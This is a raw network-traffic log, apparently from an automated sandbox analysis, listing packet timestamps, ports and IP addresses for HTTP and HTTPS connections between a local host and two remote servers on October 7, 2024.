Oct 7, 2024 03:15:44.651325941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651340961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651354074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.651355028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651393890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651406050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.651406050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.651410103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651423931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651437998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651439905 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.651452065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651479959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651480913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.651495934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651510954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651535988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651551008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651540041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.651561022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.651566029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.651596069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.651614904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.652956963 CEST	443	49864	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.664000988 CEST	443	49863	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.664083958 CEST	443	49863	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.664180994 CEST	49863	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.667870998 CEST	443	49865	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.669291019 CEST	443	49862	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.669655085 CEST	443	49862	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.672226906 CEST	49862	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.696501970 CEST	49864	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.704283953 CEST	49864	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.704313040 CEST	443	49864	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.712186098 CEST	49865	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.713118076 CEST	49864	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.713140965 CEST	443	49864	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.717407942 CEST	49863	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.717442036 CEST	443	49863	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.717459917 CEST	49863	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.717468023 CEST	443	49863	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.736212015 CEST	49862	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.736253023 CEST	443	49862	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.736298084 CEST	49862	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.736306906 CEST	443	49862	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.738986969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739020109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739033937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739054918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739068031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739080906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739095926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739099026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739110947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739124060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739145994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739161968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739173889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739176989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739195108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739204884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739213943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739227057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739238977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739247084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739252090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739264011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739303112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739312887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739321947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739324093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739336014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739358902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739362955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739370108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739399910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739403963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739411116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739423037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739430904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739439011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739454031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739466906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739489079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739501953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739510059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739571095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739583015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739593983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739607096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739609003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739609003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739618063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739630938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739634037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739643097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.739720106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.739720106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740036011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740046024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740057945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740068913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740080118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740089893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740092039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740103960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740114927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740144014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740161896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740175009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740186930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740200043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740211964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740223885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740227938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740243912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740257025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740266085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740268946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740281105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740288973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740292072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740335941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740379095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740390062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740401030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740412951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740431070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740432978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740442038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740456104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740458965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740467072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740479946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740479946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740492105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740504980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740521908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740526915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740539074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740554094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740561008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740566015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740581036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740588903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740609884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740616083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740637064 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740653992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740664005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740669012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740673065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.740705967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.740740061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741449118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741460085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741471052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741506100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741518974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741535902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741539955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741549015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741569996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741581917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741585016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741594076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741606951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741617918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741626024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741630077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741650105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741664886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741672039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741676092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741688013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741699934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741714954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741743088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741749048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741760969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741771936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741784096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741801023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741806030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741832018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741851091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741867065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741878033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741889000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741908073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741923094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741928101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741938114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741950035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741957903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.741962910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.741985083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.742010117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.742170095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742217064 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.742248058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742258072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742269993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742290020 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.742290020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742302895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742316008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742316961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.742327929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742360115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.742374897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742381096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.742386103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742418051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.742438078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.742441893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742455006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742497921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.742503881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742516041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742527962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742539883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.742549896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.742589951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.771141052 CEST	49865	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.771156073 CEST	443	49865	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.771781921 CEST	49865	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.771787882 CEST	443	49865	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.811994076 CEST	443	49864	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.812074900 CEST	443	49864	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.812164068 CEST	49864	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.824703932 CEST	49864	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.824724913 CEST	443	49864	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.824738979 CEST	49864	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.824744940 CEST	443	49864	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.828690052 CEST	49867	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.828712940 CEST	443	49867	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.828784943 CEST	49867	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.830214977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830245972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830262899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830271959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830279112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830319881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830344915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830359936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830363035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830374956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830390930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830410004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830450058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830480099 CEST	49868	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.830524921 CEST	443	49868	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.830542088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830581903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830598116 CEST	49868	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.830609083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830632925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830665112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830689907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830704927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830717087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830727100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830777884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830779076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830795050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830802917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830826998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830837965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830852985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830866098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830874920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830900908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830912113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830944061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830959082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.830964088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.830975056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831010103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831022978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831041098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831048965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831056118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831058025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831063032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831069946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831075907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831090927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831106901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831121922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831135035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831156015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831176043 CEST	49867	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.831192017 CEST	443	49867	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.831195116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831198931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831212997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831229925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831249952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831264019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831314087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831320047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831424952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831430912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831439018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831471920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831486940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831489086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831501961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831516981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831526995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831545115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831547976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831562996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831569910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831594944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831609964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831614017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831634045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831649065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831651926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831664085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831674099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831677914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831692934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831695080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831720114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831743002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831757069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831758022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831773996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831789970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831793070 CEST	49782	80	192.168.2.5	95.164.90.97
